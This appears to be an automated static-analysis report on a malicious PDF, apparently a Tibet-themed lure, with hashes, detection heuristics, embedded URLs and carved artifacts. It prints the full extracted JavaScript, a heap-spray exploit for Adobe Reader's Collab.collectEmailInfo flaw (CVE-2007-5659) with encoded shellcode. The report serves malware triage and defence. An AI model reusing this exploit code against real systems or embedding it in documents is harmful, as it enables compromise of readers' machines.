Malicious PDF — malware analysis report

Static analysis result for SHA-256 72b44f8d5b98d279…

MALICIOUS

PDF

297.3 KB Created: 2008-02-27 16:58:09 +08:00 Authoring application: PScript5.dll Version 5.2 (via Acrobat Distiller 6.0.1 (Windows)) First seen: 2026-05-08
MD5: 5842e527ee70ffd5b92721094c64a693 SHA-1: d01fb12bb974603ef27a1c8d6e90a779591ed180 SHA-256: 72b44f8d5b98d279e5102ef0d9755e7b1aa0df2201fe77ca414b5b8a784c42b5
426 Risk Score

Malware Insights

MITRE ATT&CK
T1059.007 JavaScript T1203 Exploitation for Client Execution

This PDF contains obfuscated JavaScript that utilizes the `unescape` function and the `Collab.collectEmailInfo` API, indicating exploitation of CVE-2007-5659. The script performs a heap spray, a common technique for delivering further malicious content. ClamAV detections confirm the malicious nature, identifying it as a dropper.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9403

Heuristics 11

  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (matched in decompressed stream)
  • JavaScript action low 3 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Obfuscated multi-stage PDF JavaScript heap-spray exploit critical CVE related PDF_JS_OBFUSCATED_MULTISTAGE_HEAPSPRAY
    PDF JavaScript hidden behind nested stream filters and/or a custom in-JS decoder (rolling-XOR stager) decodes to a heap-spray / ROP chain. The spray is only visible after unwinding those layers, which is why the raw heap-spray rules miss it. This is an obfuscated multi-stage Adobe Reader JavaScript exploit; the dropped Windows payload (often named Win.Trojan.Agent by signature AV) is the second stage, not the delivery mechanism.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    sc = unescape("%u9090%u9090%u9090%u9090%uEB90%u5E1a%u5B56%u068a%u303c%u1674%uE0c0%u4604%u268a%uE480%u020f%u88c4%u4303%uEB46%uE8e9%uFFe1%uFFff"+
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • ClamAV: Win.Trojan.Dropper-82 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Dropper-82
  • PDF embedded file could not be fully decoded medium PDF_EMBEDDED_FILE_UNDECODED
    A declared PDF /EmbeddedFile stream uses filters that the scanner could not decode. The raw stream was carved for artifact triage because malformed or unsupported attachment filters can hide payload content from normal extraction.
  • Embedded file low PDF_EMBEDDED
    PDF embeds a file attachment — could carry an executable or another weaponised document as a nested payload
  • XFA form low PDF_XFA
    PDF uses XML Forms Architecture — can contain script logic
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://tpprc.org/publications/pubs/autonomy_and_tibetan_perspective-2005.pdf In PDF document text
    • http://www.cclaw.net/library/legislationlaw.phpIn PDF document text
    • http://eastwestcenter.org/fileadmin/stored/In PDF document text
    • http://www.savetibet.org/news/newsitemIn PDF document text
    • http://hrichina.org/public/PDFs/MRG-HRIC.China.Report.pdfIn PDF document text
    • http://www.tibet.com/future.htmlIn PDF document text
    • http://ch.China-embassyIn PDF document text
    • http://www.articleIn PDF document text
    • http://en.tibet.cn/news/tin/t20060718_134212.htmIn PDF document text
    • http://unhcr)74(.org/cgi-bin/texis/vtx/refw)12(orld/rwmain?docid=423ea9094Referenced by PDF JavaScript
    • http://belfer)12(center)74(.ksg.harv)24(ard.edu/Referenced by PDF JavaScript
    • http://www.w3.org/1999/xhtmlIn PDF document text
    • http://www.xfa.org/schema/xfa-data/1.0/In PDF document text
    • http://www.rsf.org/article.php3?id_article=22307In PDF document text
    • http://unhcr.org/cgi-bin/texis/vtx/refworld/rwmain?docid=423ea9094In PDF document text
    • http://belfercenter.ksg.harvard.edu/files/In PDF document text
    • http://hrw.org/english/docs/2006/10/09/china14364.htmIn PDF document text
    • http://hrw.org/reports/2007/tibet0607In PDF document text
    • http://www.iht.com/articles/ap/2007/09/13/news/UN-GEN-UN-Indigenous-PeoplesIn PDF document text
    • http://timesonline.co.uk/In PDF document text
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In PDF document text
    • http://ns.adobe.com/iX/1.0/In PDF document text
    • http://ns.adobe.com/pdf/1.3/In PDF document text
    • http://ns.adobe.com/xap/1.0/In PDF document text
    • http://ns.adobe.com/xap/1.0/mm/In PDF document text
    • http://purl.org/dc/elements/1.1/In PDF document text

Extracted artifacts 6

Files carved from inside the sample during analysis.

FilenameKindSourceSize
taa pdf-embedded-file-undecodable PDF EmbeddedFile object 20 at offset 0xFC2; filter decode failed 50315 bytes
SHA-256: 4efebc8ea3f17add92b1d975a32fb977037be0f49da911ab89cfd2ca8f2738f4
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact entropy is 8.00, consistent with packed or encrypted content.
javascript_obj0017_000.js pdf-javascript-stream PDF /JS object 17 at offset 0x764 4622 bytes
SHA-256: a855e1484b6aa802ce0f6f936ba6d5b5bb5556ec34d1f510cb7f17c768fa4311
Detection
ClamAV: Win.Trojan.Dropper-82
Obfuscation or payload: likely
Carved artifact contains 16 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
function re(count,what) 
{
var v = "";
while (--count >= 0) 
v += what;
return v;
} 
function start() 
{
sc = unescape("%u9090%u9090%u9090%u9090%uEB90%u5E1a%u5B56%u068a%u303c%u1674%uE0c0%u4604%u268a%uE480%u020f%u88c4%u4303%uEB46%uE8e9%uFFe1%uFFff"+
"%u7466%u515a%u7043%u7050%u7070%u5050%u6B68%u5064%u4C50%u4B68%u5077%u6C71%u4D5a%u6B58%u5047%u4850%u794e%u4453%u6250%u5070%u5050%u7875%u5168%u4C4e%u5050%u6270%u5050%u5050%u4B68%u6C4f%u4978%u5747%u7850%u4978%u7744%u5061%u6F6f%u5757%u7850%u4866%u6C4e%u7759%u4350%u6C70%u584e%u644c%u6150%u7050%u7070%u4948%u4754%u4C61%u4F4f%u5747%u7870%u4866%u764f%u5262%u594b%u4C67%u584e%u446b%u7150%u7050%u7050%u6948%u7774%u7052%u4F6f%u7777%u6870%u7876%u457a%u7761%u5050%u6C67%u684e%u544a%u7170%u7050%u7070%u7958%u7764%u7472%u4F4f%u4767%u5870%u5866%u4B6f%u6779%u6D4f%u6F50%u584e%u5449%u6150%u7050%u7070%u5958%u4764%u5852%u4F4f%u4767%u6850%u4856%u6651%u6576%u7A4f%u7041%u786e%u6458%u4150%u5070%u7070%u4978%u6764%u4C62%u6F6f%u6767%u7850%u5866%u4F41%u6967%u5A70%u684e%u686e%u7467%u5150%u7050%u5050%u4948%u5774%u5063%u4F6f%u7767%u6850%u7856%u5572%u706b%u4F4f%u726c%u484e%u6446%u5170%u5050%u5070%u7968%u5754%u7463%u6F4f%u6777%u5870%u4856%u6C5a%u4850%u7A4d%u5667%u784e%u7455%u4170%u7070%u5050%u4948%u7744%u7853%u6F4f%u4747%u7850%u4866%u4849%u4E6f%u4A58%u4E70%u586e%u4474%u6170%u5050%u5050%u5978%u5744%u4C73%u4F4f%u4757%u7850%u4846%u5467%u4968%u6C6e%u6959%u584e%u6463%u4170%u5050%u5070%u7958%u4754%u7054%u4F4f%u7777%u7850%u4846%u6E47%u784d%u524e%u5377%u786e%u4452%u4170%u7070%u7070%u5958%u5764%u4464%u6F6f%u5757%u6850%u7856%u4D5a%u6B49%u4D77%u4F4d%u784e%u7441%u7170%u7050%u7050%u7978%u6744%u6864%u6F4f%u5777%u5061%u6F6f%u6775%u6473%u6363%u766f%u4664%u6D78%u6764%u5046%u7045%u7645%u4F6f%u5755%u4854%u7358%u584f%u4F6f%u4447%u726f%u4D73%u7070%u5041%u7070%u7050%u4667%u4B4e%u7978%u4774%u7450%u4978%u5747%u5046%u6F6f%u5757%u4470%u7A46%u7054%u6F4f%u6765%u4C51%u7948%u5744%u6C45%u5A76%u5070%u6A46%u5070%u4A56%u7070%u6F6f%u5747%u7066%u6F4f%u7775%u4873%u4348%u584f%u6F4f%u4447%u6B54%u6A46%u7070%u6D78%u6F45%u5057%u5375%u4F4f%u4757%u6470%u4F6f%u5777%u6C65%u6F4f%u7747%u5056%u4F6f%u4745%u4C62%u4B68%u4F74%u5067%u7378%u696e%u7041%u4B48%u5744%u4C45%u5074%u4148%u4873%u4664%u4E62%u7A55%u4876%u7567%u4950%u5148%u5847%u6470%u6352%u7650%u7148%u6951%u5477%u5450%u526e%u6C4e%u6B6e%u4A41%u7378%u506c%u4850%u5948%u7744%u6451%u7064%u4148%u4853%u6A74%u5567%u5356%u6B64%u5557%u4970%u7178%u7847%u6470%u6241%u4150%u5348%u6961%u4447%u6E50%u624e%u4C4e%u4F6f%u5777%u6C45%u4F4f%u7745%u7052%u6F70%u5548%u4267%u6F6f%u4F4f%u6F4f%u6378%u706c%u7850%u7978%u6744%u5871%u4A76%u7070%u7866%u5068%u7050%u7070%u5070%u5A66%u6270%u5A76%u7070%u4A46%u5050%u7856%u7070%u5050%u7070%u7064%u4F4f%u4777%u5071%u6F6f%u4765%u7462%u4978%u7774%u7476%u776c%u6754%u4C46%u6D54%u7A65%u7049%u5050%u6A56%u5070%u4D78%u6F55%u7047%u5355%u7A66%u6450%u4D48%u6F65%u4C76%u6375%u6F6f%u5767%u4466%u6F4f%u6765%u7063%u4B68%u7774%u5851%u6B42%u5754%u5461%u7368%u586e%u5850%u6B78%u4F55%u7471%u7043%u5370%u6374%u7844%u5368%u786f%u5050%u6557%u474f%u5A46%u7050%u4D58%u4F65%u5067%u6375%u4B58%u4F65%u4841%u6B52%u4F65%u4441%u6358%u4B4e%u6870%u6375%u4F6f%u4757%u6441%u4F6f%u5767%u7456%u4F4f%u5745%u7073%u6F4f%u4747%u5446%u6F4f%u4765%u6862%u5A56%u7050%u6F4f%u5767%u5071%u4F6f%u6755%u6C63%u7A56%u5050%u4F4f%u4745%u4454%u7575%u6B68%u4C6e%u4745%u4B78%u4D77%u6870%u4B78%u6D75%u4C70%u6645%u4B68%u5357%u6C53%u6B48%u5457%u4E71%u7857%u4350%u736f%u6675%u4B58%u4677%u5042%u7350%u734f%u6343%u696c%u6974%u4174%u6D7a%u4370%u636c%u4675%u7373%u564f%u4F70%u6E4b%u7071%u5A73%u626f%u7467%u5850%u414c%u4E4c%u6D50%u4350%u524f%u5044%u6B4e%u514f%u4B53%u4E6f%u4E45%u5567%u454e%u4A75%u6B58%u4B6e%u6B58%u6A75%u6442%u7370%u4D6d%u7656%u4B48%u6C70%u6B74%u4B58%u4A45%u6C51%u6370%u4D4d%u6B78%u6470%u4B58%u6350%u754c%u6E45%u4F55%u6D65%u626c%u7850%u7050%u486e%u476c%u6D6f%u4F4f%u6F6f%u4346%u4A73%u6C55%u5176%u4E52%u5556%u5857%u7576%u7050" +
"%u3030");

if (app.viewerVersion >= 7.0)
{
plin = re(1124,unescape("%u0b0b%u0028%u06eb%u06eb")) + unescape("%u0b0b%u0028%u0aeb%u0aeb") + unescape("%u9090%u9090") + re(122,unescape("%u0b0b%u0028%u06eb%u06eb")) + sc + re(1256,unescape("%u4141%u4141"));
} 
else 
{
ef6 =  unescape("%uf6eb%uf6eb") + unescape("%u0b0b%u0019");
plin = re(80,unescape("%u9090%u9090")) + sc + re(80,unescape("%u9090%u9090"))+ unescape("%ue7e9%ufff9")+unescape("%uffff%uffff") + unescape("%uf6eb%uf4eb") + unescape("%uf2eb%uf1eb");
while ((plin.length % 8) != 0) 
plin = unescape("%u4141") + plin;

plin += re(2626,ef6);
}
if (app.viewerVersion >= 6.0)
{
this.collabStore = Collab.collectEmailInfo({subj: "",msg: plin});
}
}
var shaft = app.setTimeOut("start()",1200);
font_00_cff_off000111bd.bin pdf-font-stream PDF embedded font (cff) at offset 0x111BD 6001 bytes
SHA-256: b59c8b56bbd05b39731d026bb1e9a68d718236fcba29d458ced3ef1809ab6dc9
font_01_cff_off00012aad.bin pdf-font-stream PDF embedded font (cff) at offset 0x12AAD 10198 bytes
SHA-256: 5d7296b100fea97c4ff10a4765b0e263b1a96621ff7aec254a4bce68ab323933
font_02_cff_off00015139.bin pdf-font-stream PDF embedded font (cff) at offset 0x15139 7429 bytes
SHA-256: 123145918844774e735074b07137e840110a5748007f3db4811abf6d03cc89be
font_03_cff_off00016d59.bin pdf-font-stream PDF embedded font (cff) at offset 0x16D59 5031 bytes
SHA-256: f1644939785a2ce809d70b82add71e80b9619bbe1f13756f0d67e5d9815bf82b